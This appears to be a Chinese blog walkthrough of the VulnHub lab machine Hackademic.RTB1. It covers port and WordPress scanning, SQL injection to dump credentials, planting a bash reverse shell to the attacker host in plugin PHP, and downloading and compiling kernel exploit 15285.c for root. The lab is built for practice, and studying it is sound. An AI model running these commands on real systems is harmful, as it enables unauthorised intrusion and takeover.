当前位置: 首页 > news >正文

Hackademic.RTB1靶场实战【超详细】

news 来源:原创 2024/9/20 20:43:16

靶机下载链接:https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip

一、主机探测和端口扫描

nmap 192.168.121.0/24

ip:192.168.121.196

端口:22、80

二、访问80端口

发现target可点击

点击后跳转,页面提示目标是读取到 key.txt 文件

findsomething插件 查看网站的js接口

拼接 /Hackademic_RTB1/?feed=rss 看到 wordpress 版本

三、目录扫描

dirb http://192.168.121.196/

前面发现为 wordpress,kali 使用 wpscan 扫描网站

wpscan --url  http://192.168.121.196

其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css

可以看到 wp-content 位置,尝试将其修改为 wordpress的默认路径wp-admin,发现后台登录页面

使用 wpscan 扫描用户

使用 cewl 爬取网站密码文本

cewl 192.168.121.196 -w pass.txt

密码未能成功爆破

我们回到findsomething中,发现url中携带参数

可以进行sql注入

首先测cat参数,发现存在sql注入

dump 下数据,获取账号密码

挨个登录,登录GeorgeMiller发现插件里面能直接修改php代码,我们添加phpinfo,发现成功解析

四、get shell

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.121.171/4444 0>&1'");

kali开启监听,访问hello.php文件,成功反弹shell

五、提权

使用 python 启用交互式shell

sudo -l

查看当前权限,发现需要密码

查看内核版本

uname -a

搜一下相关版本的提权漏洞

searchsploit linux kernel 2.6.3

排除一些其他 linux 操作系统,精确版本,尝试后发现 15285.c 可利用

searchsploit -m 15285

开启一个临时 web 服务,靶机将其下载到 tmp 目录下

python3 -m http.serverwget http://192.168.121.171:8000/15285.c

进行编译后,执行文件,提权成功

gcc 15285.c -o 15285
./15285

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • S71200 - 编程 - 笔记
  • ZooKeeper 集群的详细部署
  • eNSP 华为三层交换机实现VLAN间通信
  • 【课程总结】day23:大模型训练策略(BERT模型与GLM模型)
  • 【若依 - 前后端不分离版】SysCaptchaController 详解:生成与处理验证码
  • springboot2.x到spring3.x的一些变化和示例说明
  • 花钱买不到系列之—linux系统调用
  • 嵌入式学习Day29---Linux软件编程---网络编程
  • 力扣--最长公共前缀
  • C++ 对象构造语义学——局部对象、全局对象的构造和析构
  • MINIO图片地址浏览器打开不显示
  • python中的列表、元组、字典之间的区别
  • 刑法学学习笔记(个人向) Part.1
  • haproxy 7000字配图超详细教程 从小白到入门
  • docker知识点
  • 收藏网友的 源程序下载网
  • 《Javascript数据结构和算法》笔记-「字典和散列表」
  • Essential Studio for ASP.NET Web Forms 2017 v2,新增自定义树形网格工具栏
  • express + mock 让前后台并行开发
  • Java比较器对数组,集合排序
  • Js实现点击查看全文(类似今日头条、知乎日报效果)
  • linux学习笔记
  • Redis 中的布隆过滤器
  • Vue全家桶实现一个Web App
  • 对JS继承的一点思考
  • 关于Flux,Vuex,Redux的思考
  • 汉诺塔算法
  • 快速构建spring-cloud+sleuth+rabbit+ zipkin+es+kibana+grafana日志跟踪平台
  • 理解 C# 泛型接口中的协变与逆变(抗变)
  • 聊聊spring cloud的LoadBalancerAutoConfiguration
  • 名企6年Java程序员的工作总结,写给在迷茫中的你!
  • 前端 CSS : 5# 纯 CSS 实现24小时超市
  • 入手阿里云新服务器的部署NODE
  • 数据结构java版之冒泡排序及优化
  • 想使用 MongoDB ,你应该了解这8个方面!
  • 一道闭包题引发的思考
  • 好程序员web前端教程分享CSS不同元素margin的计算 ...
  • 智能情侣枕Pillow Talk,倾听彼此的心跳
  • ​软考-高级-系统架构设计师教程(清华第2版)【第12章 信息系统架构设计理论与实践(P420~465)-思维导图】​
  • ## 1.3.Git命令
  • (Java入门)抽象类,接口,内部类
  • (k8s中)docker netty OOM问题记录
  • (Repost) Getting Genode with TrustZone on the i.MX
  • (附源码)springboot猪场管理系统 毕业设计 160901
  • (附源码)计算机毕业设计SSM基于java的云顶博客系统
  • (规划)24届春招和25届暑假实习路线准备规划
  • (六)c52学习之旅-独立按键
  • (免费领源码)Java#Springboot#mysql农产品销售管理系统47627-计算机毕业设计项目选题推荐
  • (七)c52学习之旅-中断
  • (四)鸿鹄云架构一服务注册中心
  • (原创)攻击方式学习之(4) - 拒绝服务(DOS/DDOS/DRDOS)
  • (转)IIS6 ASP 0251超过响应缓冲区限制错误的解决方法
  • (转)MVC3 类型“System.Web.Mvc.ModelClientValidationRule”同时存在
  • (转)Mysql的优化设置
  • *Django中的Ajax 纯js的书写样式1